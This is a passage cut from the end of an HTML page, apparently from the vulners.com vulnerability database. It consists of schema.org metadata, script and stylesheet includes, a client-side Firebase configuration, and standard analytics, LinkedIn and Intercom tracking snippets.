                "telephone": "+7-903-595-05-03",
                "contactType": "customer service"
            }
        ]
    }
</script>
<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "WebSite",
        "url": "https://vulners.com",
        "potentialAction": {
            "@type": "SearchAction",
            "target": "https://vulners.com/search?query={search_term_string}",
            "query-input": "required name=search_term_string"
        }
    }
</script>
<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Person",
        "name": "Vulners Database",
        "url": "https://vulners.com",
        "sameAs": [
            "https://www.facebook.com/vulnersdb/",
            "https://www.linkedin.com/company/vulners/",
            "https://twitter.com/VulnersCom"
        ]
    }
</script>

<script src="/static/js/vendor/fetch.js" type="text/javascript" defer></script>
<script src="/static/js/vendor/highlight.min.js" type="text/javascript" defer></script>
<script src="/static/js/vendor/analytics-index.js" type="text/javascript" async ></script>
<script src="/static/js/vendor/yandex-metrica.js" type="text/javascript" async ></script>
<script src="/static/js/vendors.js" type="text/javascript" defer></script>
<script src="/static/js/bundle.js" type="text/javascript" defer></script>
<script src="https://www.google.com/recaptcha/api.js?render=6LebRZQUAAAAAMrdwqoFrTsVzcM1VL6c6aRhfN05" async ></script>


<link href="/static/css/light.css" rel="stylesheet" type="text/css" />
<link href="/static/css/monokai_sublime.css" rel="stylesheet" type="text/css" />
<link href="//fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" />

<script src="https://www.gstatic.com/firebasejs/3.6.6/firebase.js" ></script>
<script src="https://www.gstatic.com/firebasejs/3.6.6/firebase-app.js" ></script>
<script src="https://www.gstatic.com/firebasejs/3.6.6/firebase-messaging.js" ></script>
<script>
    // Initialize Firebase
    var config = {
        apiKey: "AIzaSyDZYvPOmPeJ_QpuFvtxlzRpX1GezW1lyeI",
        authDomain: "vulners-6512e.firebaseapp.com",
        databaseURL: "https://vulners-6512e.firebaseio.com",
        storageBucket: "vulners-6512e.appspot.com",
        messagingSenderId: "554536724721"
    };
    firebase.initializeApp(config);
</script>

<script type="text/javascript" id="hs-script-loader" async defer src="//js-na1.hs-scripts.com/19778810.js"></script>

<noscript><div><img src="https://mc.yandex.ru/watch/34503445" style="position:absolute; left:-9999px;" alt="" /></div></noscript>

<!-- LinkedIn Pixel Code -->
<script type="text/javascript">
    _linkedin_partner_id = "3339324";
    window._linkedin_data_partner_ids = window._linkedin_data_partner_ids || [];
    window._linkedin_data_partner_ids.push(_linkedin_partner_id);
</script><script type="text/javascript">
    (function(l) {
        if (!l){window.lintrk = function(a,b){window.lintrk.q.push([a,b])};
            window.lintrk.q=[]}
        var s = document.getElementsByTagName("script")[0];
        var b = document.createElement("script");
        b.type = "text/javascript";b.async = true;
        b.src = "https://snap.licdn.com/li.lms-analytics/insight.min.js";
        s.parentNode.insertBefore(b, s);})(window.lintrk);
</script>
<noscript>
    <img height="1" width="1" style="display:none;" alt="" src="https://px.ads.linkedin.com/collect/?pid=3339324&fmt=gif" />
</noscript>
<!-- End LinkedIn Pixel Code -->

<!-- Intercom script -->
<script>
    window.intercomSettings = {
        app_id: "yvthp6m3"
    };
</script>
<script>
    if (window.location.host === 'beta.vulners.com') {
        (function(){var w=window;var ic=w.Intercom;if(typeof ic==="function"){ic('reattach_activator');ic('update',w.intercomSettings);}else{var d=document;var i=function(){i.c(arguments);};i.q=[];i.c=function(args){i.q.push(args);};w.Intercom=i;var l=function(){var s=d.createElement('script');s.type='text/javascript';s.async=true;s.src='https://widget.intercom.io/widget/yvthp6m3';var x=d.getElementsByTagName('script')[0];x.parentNode.insertBefore(s,x);};if(w.attachEvent){w.attachEvent('onload',l);}else{w.addEventListener('load',l,false);}}})();
    }
</script>
<!-- End Intercom script -->


</body>
</html>